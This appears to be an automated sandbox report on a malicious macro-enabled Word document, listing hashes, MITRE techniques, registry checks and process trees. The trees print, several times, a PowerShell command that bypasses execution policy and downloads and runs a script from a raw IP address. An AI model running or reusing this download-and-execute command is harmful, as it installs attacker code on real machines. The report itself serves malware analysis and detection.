72f6526ae5d46195d9105ccb43d074a15dc7a775e577ca42b3b06964aad4c8ec

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
12/02/2024, 06:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Application#37.docm
Size

79KB
MD5

5a53fcaae49b293fb475009b089289d2
SHA1

43d00e702689a60108206055e7448a114b018da0
SHA256

72f6526ae5d46195d9105ccb43d074a15dc7a775e577ca42b3b06964aad4c8ec
SHA512

9ed406f3bf2a2d97b21b36142220b3bf84f9e51cc7ec883d7c910b7fc8c9eb52d20687f5a96670a8cff8da683a0c7efdb6fdd04cce38be39cebee20a4f099beb
SSDEEP

1536:3rqu+lO2Oq6qKSJBKixVjYWdp4RvikgWUNXRIDBXceQ23B5X8Qr37L6:3ryuq6qtK1v5g3NXRI/Q23Xxr37L6

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4672	4776	wscript.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	936	4776	wscript.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	380	4776	wscript.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2688	4776	wscript.exe	84
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3228	4776	wscript.exe	84

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3300	WINWORD.EXE
3300	WINWORD.EXE

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3300	WINWORD.EXE
3300	WINWORD.EXE
3300	WINWORD.EXE
3300	WINWORD.EXE
3300	WINWORD.EXE
3300	WINWORD.EXE
3300	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Application#37.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3300

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radAC660.tmp
1⤵
- Process spawned unexpected child process
PID:4672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://213.139.205.131/update_ver')|iex"
  2⤵
  PID:3800

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radBF177.tmp
1⤵
- Process spawned unexpected child process
PID:936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://213.139.205.131/update_ver')|iex"
  2⤵
  PID:4684

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\radF477A.tmp
1⤵
- Process spawned unexpected child process
PID:380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://213.139.205.131/update_ver')|iex"
  2⤵
  PID:1352

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\rad5898E.tmp
1⤵
- Process spawned unexpected child process
PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://213.139.205.131/update_ver')|iex"
  2⤵
  PID:2928

C:\Windows\system32\wscript.exe
wscript /E:vbscript C:\Users\Admin\AppData\Local\Temp\rad9573F.tmp
1⤵
- Process spawned unexpected child process
PID:3228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
43f4bec966ab901ac034fc136a642fa5

SHA1
8e7227cefec8b05c9a79b2751d1261187b9c0422

SHA256
09ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4

SHA512
a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ptu2vlp.mac.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\radAC660.tmp

Filesize
239B

MD5
992a432c3157b0be41fe29065b8a657b

SHA1
cdb80a231235ac2030e6f9574a57719a76d8cbbd

SHA256
2bc95ede5c16f9be01d91e0d7b0231d3c75384c37bfd970d57caca1e2bbe730f

SHA512
bada3ff90afd441e21972ad138771f2d737684215bd19a679d68882a0f38e70ac47da0fc4d154faf63cff5e0cce01ca45bbef27a4aec635e097cf863a4336e91

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
memory/1352-128-0x000002673CBE0000-0x000002673CBF0000-memory.dmp

Filesize
64KB

Download
memory/1352-127-0x000002673CBE0000-0x000002673CBF0000-memory.dmp

Filesize
64KB

Download
memory/1352-125-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/1352-149-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/1352-151-0x000002673CBE0000-0x000002673CBF0000-memory.dmp

Filesize
64KB

Download
memory/1352-153-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/2928-148-0x000001E1CEBB0000-0x000001E1CEBC0000-memory.dmp

Filesize
64KB

Download
memory/2928-147-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/2928-150-0x000001E1CEBB0000-0x000001E1CEBC0000-memory.dmp

Filesize
64KB

Download
memory/3300-15-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-1-0x00007FF8E8C30000-0x00007FF8E8C40000-memory.dmp

Filesize
64KB

Download
memory/3300-16-0x00007FF8E6570000-0x00007FF8E6580000-memory.dmp

Filesize
64KB

Download
memory/3300-17-0x00007FF8E6570000-0x00007FF8E6580000-memory.dmp

Filesize
64KB

Download
memory/3300-34-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-42-0x00000243038F0000-0x00000243040F0000-memory.dmp

Filesize
8.0MB

Download
memory/3300-43-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-14-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-56-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-57-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-58-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-59-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-60-0x00000243038F0000-0x00000243040F0000-memory.dmp

Filesize
8.0MB

Download
memory/3300-61-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-73-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-13-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-75-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-11-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-2-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-4-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-3-0x00007FF8E8C30000-0x00007FF8E8C40000-memory.dmp

Filesize
64KB

Download
memory/3300-5-0x00007FF8E8C30000-0x00007FF8E8C40000-memory.dmp

Filesize
64KB

Download
memory/3300-6-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-92-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-102-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-7-0x00007FF8E8C30000-0x00007FF8E8C40000-memory.dmp

Filesize
64KB

Download
memory/3300-129-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-0-0x00007FF8E8C30000-0x00007FF8E8C40000-memory.dmp

Filesize
64KB

Download
memory/3300-8-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-107-0x0000024304A80000-0x0000024305A50000-memory.dmp

Filesize
15.8MB

Download
memory/3300-9-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-10-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3300-12-0x00007FF928BB0000-0x00007FF928DA5000-memory.dmp

Filesize
2.0MB

Download
memory/3800-87-0x000002163D7A0000-0x000002163D7B0000-memory.dmp

Filesize
64KB

Download
memory/3800-109-0x000002163D7A0000-0x000002163D7B0000-memory.dmp

Filesize
64KB

Download
memory/3800-108-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/3800-82-0x000002163D7B0000-0x000002163D7D2000-memory.dmp

Filesize
136KB

Download
memory/3800-112-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/3800-86-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/3800-89-0x000002163D7A0000-0x000002163D7B0000-memory.dmp

Filesize
64KB

Download
memory/3800-88-0x000002163D7A0000-0x000002163D7B0000-memory.dmp

Filesize
64KB

Download
memory/4684-105-0x000001F77B0A0000-0x000001F77B0B0000-memory.dmp

Filesize
64KB

Download
memory/4684-134-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/4684-103-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/4684-132-0x000001F77B0A0000-0x000001F77B0B0000-memory.dmp

Filesize
64KB

Download
memory/4684-131-0x000001F77B0A0000-0x000001F77B0B0000-memory.dmp

Filesize
64KB

Download
memory/4684-130-0x00007FF8FB890000-0x00007FF8FC351000-memory.dmp

Filesize
10.8MB

Download
memory/4684-106-0x000001F77B0A0000-0x000001F77B0B0000-memory.dmp

Filesize
64KB

Download
memory/4684-104-0x000001F77B0A0000-0x000001F77B0B0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads